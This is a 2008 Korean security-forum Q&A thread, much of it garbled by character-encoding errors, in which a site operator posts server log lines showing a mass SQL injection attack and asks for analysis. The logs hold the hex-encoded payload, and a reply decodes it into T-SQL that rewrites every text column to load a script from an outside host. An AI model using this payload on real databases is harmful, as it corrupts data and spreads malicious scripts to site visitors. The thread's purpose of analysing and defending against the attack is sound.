Å©·¡Å· ÇÇÇØ

 423, 1/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   youngman0707
   sqlÀÎÁ§¼Ç¹®Á¦Àä...ÄÚµåºÐ¼®Á¡ ºÎŹµå¸³´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=382 [º¹»ç]


%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20AnD%20''=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20And%20'%25'=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--%20aNd%20'%25'=
  Hit : 3765     Date : 2008/11/10 03:27


    
youngman0707 Á¦°¡ Áö½ÄÀ̾è¾Æ¼­ ..ÀÌ·±°Å¹ß»ýÇßÀ»¶§..¾î¶»°Ô ºÐ¼®..±×¸®°í º¸¾ÈÇؾߵǴÂÁö ..°í¼ö´ÔµéÀÇ Àâ´ÙÇÑ
ÇѸ»¾¹ºÎŹµå¸³´Ï´Ù..

Àâ´ÙÇÑ ÇѸ»¾¹ÀÌ Àú¿¡°Õ Å«ÈûÀ̵˴ϴÙ..
¿À´Ãµµ Áñ°Å¿î ÇϷ纸³»¼¼¿ä..		 2008/11/10  
ÃʵùÇØÄ¿ ÈÉ..
ÄO¾Æ
Âü Çè³­Çϱ¸³ª..

ÄO phpÁ» ÇÒÁپ˾Æ?
<?
echo(urldecode("$str"));
?>

À§ ÀÌ»óÇÑ ¹®ÀÚ¿­À» ¿ä±â $str ÀÎÀÚ·Î Àü´ÞÇϸé Á» ¸¶À½ÀÌ ¾ÈÁ¤µÉ²¿¾ß		 2008/11/10  
pr0sp3r Çì´õºÎºÐÀº ³¯¸®°í ½ÇÁ¦ °ø°Ý Äõ¸®´Â 0xºÎÅÍ Çí»ç°ªº¯Á¶ÈÄ urndecode Çϸé¾Æ·¡¿Í °°ÀÌ µË´Ï´Ù.<br />
<br />
%' ;dEcLaRe @S VaRcHaR(4000) SeT @s=DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE [' @T '] SET [' @C ']=RTRIM(CONVERT(VARCHAR(4000),[' @C '])) ''<script src=http://s.cawjb.com/s.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Curso aS VaRcHaR(4000));eXeC(@s);-- aNd '%'=		 2008/11/11  
k1rha ¿äÁò ÀÌÄÚµå Á¤¸» ÀÚÁÖº¸°Ô µÇ³×¿ä ¤»¤» mass sql injection °ø°ÝÀä, ½ÇÁ¦·Î ¹æ¾î¹ýÀº ¿øõÀûÀ¸·Î sql injection ¹æ¾î¹ý°ú °°½À´Ï´Ù¸¸, mass sql ÀÇ È­µÎ°¡ µÈÀÌÀ¯´Â IDS IPS ¸¦ ¿ìȸ ÇÒ¼ö ÀÖ´Ù´Â Á¡ÀÔ´Ï´Ù. ÀÌÁ¡À» ºñ·ÔÇØ ¹æ¾î¹ýÀ» ¼³¸íµå¸®ÀÚ¸é ÇÊÅ͸µ ±¸¹®¿¡ mass sql ¸¸ÀÇ ±¸¹®À» ÇÊÅ͸µ ÇØÁÖ¸é µÈ´Ù°í ÇÏ´õ±º¿ä ... 2008/11/14  
423   ¸®´ª½º ½Ã½ºÅÛ ÇØÅ·À» ¹è¿ì°í½ÍÀº ÄÄ°ø2°³¿ù »õ³»±âÀÔ´Ï´Ù[9]     morieye
 01/10 3401
422   ¸¶ÀÌÄõ¸® ÇØÅ·     dlaudgkr
 12/07 5455
421   ¿ÍÀÌÆÄÀÌ ÇØÅ·[1]     LK7C SINEAD
 09/17 3894
420   DB °¡ ÇØÅ·´çÇß½À´Ï´Ù.[5]     gilm1209
 11/26 4156
419   ÀÌ·± °æ¿ì ¾ÆÀ̵ðÇØÅ· ½ºÆÔÀ¸·Î °ø°ÝÇÏ¸é ¾ÈµÇ´Â °Ç°¡¿ä?[2]     writed
 07/21 3599
418   °³ÀÎ pc º¸¾ÈÁ¡°Ë °ü·ÃÇؼ­[1]     braveman2
 08/06 3708
417   ¾î´À Áú¹®¹æ¿¡ ¿Ã·Á¾ß µÇ´ÂÁö ¸ô¶ó¼­¿ä~ °í¼ö´Ôµé µµ¿òºÎŹµå·Á¿ä~[1]     osssy
 05/18 3222
416   ÇØÅ·´çÇÑ°ÇÁö ¾Æ´Ñ°ÇÁö È®½ÇÇÏ°Ô ¾Æ´Â ¹æ¹ý ¾ø³ª¿ä?[2]     juh11
 05/17 3848
415   windows2003 ¶ó¿ìÆÃ¹× ¿ø°Ý ¾×¼¼½º ÇØÅ·[1]     geneve27
 04/26 5234
414   ¸ð¸£´Â ip°¡ Á¢±ÙÇؿԴµ¥ Á» ºÁÁÖ¼¼¿ä[4]     Gloverman
 01/09 6068
413   ÇØÅ·ÇÑ´Ù°í ¹®ÀÚ°¡ ¿Ô´Âµ¥¿ä[9]     yakida1940
 10/03 4859
412   ÇØÅ·´çÇÑ°Å°°¾Æ¿ä[3]     dmscks1
 07/15 4213
411   Á¦°¡ .. ÇØÄ¿ ÇÑÅ× ´çÇߴµ¥¿ä .. Áö±Ý IP µµ µûÀÎ »óÅÂ¶ó ¸¶¿ì½º¶û Å°º¸µå°¡ ..[7]     zjafkays
 07/06 5333
410   ÇØÅ·À» ´çÇÑ°Í °°¾Æ¿ä.....[5]     gkswls123
 06/22 4461
409   µµ¿ÍÁÖ¼¼¿ä ¤Ð¤Ð[2]     wnm1234
 05/17 3976
408   µµ¿ÍÁÖ¼¼¿ä.[2]     sdc04303
 05/07 4865
407   ¿©±â¿¡ ½áµµ µÇ´ÂÁö ¸ð¸£°Ú´Âµ¥¿ä www.xindpkz.com ÀÌ°Í ¶§¹®¿¡¿ä ³»¿ëÀÖ½À´Ï´Ù.[4]     nmy89
 04/10 5846
406   GmailÀ» ÇØÅ·´çÇؼ­ »ç¿ëÇÏÁö ¸øÇÏ°í ÀÖ½À´Ï´Ù.[3]     hoaxinh
 02/07 5076
405   ¤Ð¤Ð¤Ð[5]     ¾¾¿¡¸£
 01/30 4324
404   ¾Æ´Â ´©´Ô²²¼­ ½ºÅäÅ·(?)´çÇϽô µí Çѵ¥¿ä..[3]     dokokou
 01/22 6005
1 [2][3][4][5][6][7][8][9][10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org